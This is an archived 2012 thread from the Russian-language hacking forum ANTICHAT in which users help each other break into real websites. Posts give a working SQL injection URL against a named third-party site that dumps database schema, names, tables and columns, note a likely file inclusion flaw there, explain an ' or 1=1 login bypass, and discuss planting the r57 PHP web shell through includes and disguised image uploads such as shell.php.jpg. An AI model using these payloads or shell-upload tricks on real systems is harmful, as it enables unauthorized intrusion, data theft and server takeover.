ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.01.2012, 02:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Сообщение от None
C .txt? тоже ничего не получается. Я залил shell.php и shell.txt в папку www, туда их надо заливать? И почему shell.php не будет работать , вот зайди http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt , все работает , или то что мне показывает это сгенерированый html?
php на сервере интерпретируется (если там конечно есть поддержка php) , и отдает на уже ответ а не исходник самого шела, ты же когда инклудишь тебе нужен именно код, почитай http://php.su/functions/?include
Сообщение от None
Я скорее всего не правильно заливаю на сервер как ты говоришь. Я заливаю через total commander в папку www сайта. А как надо?
так и нужно, тогда нужно искать проблему с конфигурацией сервера, сервер после изменений в php.ini перезагружал ? В .htaccess коментарии поубирал как и говорилось выше ?
|
|
|
|
28.01.2012, 02:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
937
Репутация:
0
|
|
Вставлю и я свои 3 копейки
http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands'+u nion+select+SCHEMA_NAME+from+information_schema.SC HEMATA'
Ругается на точку между именем базы и таблицей. Пробовал и чаром и конкатенацией, и хекс\анхекс, но ничего не помогает.
Я думаю, что это мускул ругается на точку, так как точно знаю, что она нормально проходит и отображается, если сделать так:
http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands'+union+select+CHAR(46)'
Я тут совсем недавно, может быть что-то не понимаю? Пробовал поиск по форуму, но ничего аналогичного не нашел.
|
|
|
|
28.01.2012, 03:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от Brain_Enable
Brain_Enable said:
Вставлю и я свои 3 копейки
http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands'+u nion+select+SCHEMA_NAME+from+information_schema.SC HEMATA'
Ругается на точку между именем базы и таблицей. Пробовал и чаром и конкатенацией, и хекс\анхекс, но ничего не помогает.
Я думаю, что это мускул ругается на точку, так как точно знаю, что она нормально проходит и отображается, если сделать так:
http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands
'
+union+select+CHAR(46)
'
Я тут совсем недавно, может быть что-то не понимаю? Пробовал поиск по форуму, но ничего аналогичного не нашел.
текст ошибки лучше покажи.
trololoman96, ну да, ты прав в этом, но как там и написано
Сообщение от None
; This file attempts to overwrite the original php.ini file.
Doesnt always work
.
|
|
|
|
28.01.2012, 03:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
937
Репутация:
0
|
|
Сообщение от Чакэ
Чакэ said:
текст ошибки лучше покажи.
Когда пишу точку, говорит:
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/flash/cmdhelp.ru/index.php on line 19
Без точки нормально все получается, имею ввиду не конкретно этот запрос.
|
|
|
|
28.01.2012, 04:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от Brain_Enable
Brain_Enable said:
Когда пишу точку, говорит:
Warning
: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/flash/cmdhelp.ru/index.php on line 19
Без точки нормально все получается, имею ввиду не конкретно этот запрос.
это не на точку ругается. ты не туда смотришь..
Код HTML:
HTML:
http://www.cmdhelp.ru/index.php?cmd='+union+select+concat_ws(0x3a,table_schema,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+0,1--+
далее 44 раза инкрементишь цифру 0. ну ты понел.. и ещё кажется там lfi
|
|
|
|
28.01.2012, 05:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
4744
Репутация:
4
|
|
Привет всем.
каким должен быть запрос при авторизации чтоб это - ' or 1=1/* ))) прокатило ?
|
|
|
|
28.01.2012, 05:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
937
Репутация:
0
|
|
Не работает. После того как скопировал, пробелы(которые форум добавляет) естественно убрал
Почему названия столбцов разделяются двоеточием, а не запятой?
Вы сами пробовали этот код?
|
|
|
|
28.01.2012, 05:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
13201
Репутация:
17
|
|
Сообщение от Киев
Киев said:
Привет всем.
каким должен быть запрос при авторизации чтоб это - ' or 1=1/* ))) прокатило ?
Примерно таким:
$mysql_query="SELECT * FROM prefix_users WHERE username=' ".$username." ' and password='".$password.'";
Тогда при вставке твоего кода получается:
$mysql_query="SELECT * FROM prefix_users WHERE username=' ' or 1=1/*" ' and password='".$password."';
То есть если нет пользователя с пустым именем, то извлекается первый попавшийся пользователь.
|
|
|
|
28.01.2012, 06:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
есть где почитать подробнее про заливку шела через картинку?
просто загнать шелл.пхп не получается..сначало резало js...потом я скрипт этот выпилил и теперь режет с серверной стороны.
переименовал шелл в шелл.пхп.жпг, получил в аватарку себе -
жду советов |
|
|
|
28.01.2012, 07:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
42706
Репутация:
6
|
|
Justonline
Возможно ты залил картинку,посмотри firebug'ом или в исходном коде путь картинки и запускай шелл.
PS:Народ форум IPB,можно ли через attachments как нибудь залить шелл?Мне просто интересно,доступно прикрепление файлов всех форматов,а вот по ссылке предлагает скачать..как узнать где хранится прикрепленный файл на сервере форума именно в том формате какой я залил? Или это не работает?
Установить форум и проверить нет возможности,поэтому прошу знатоков)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
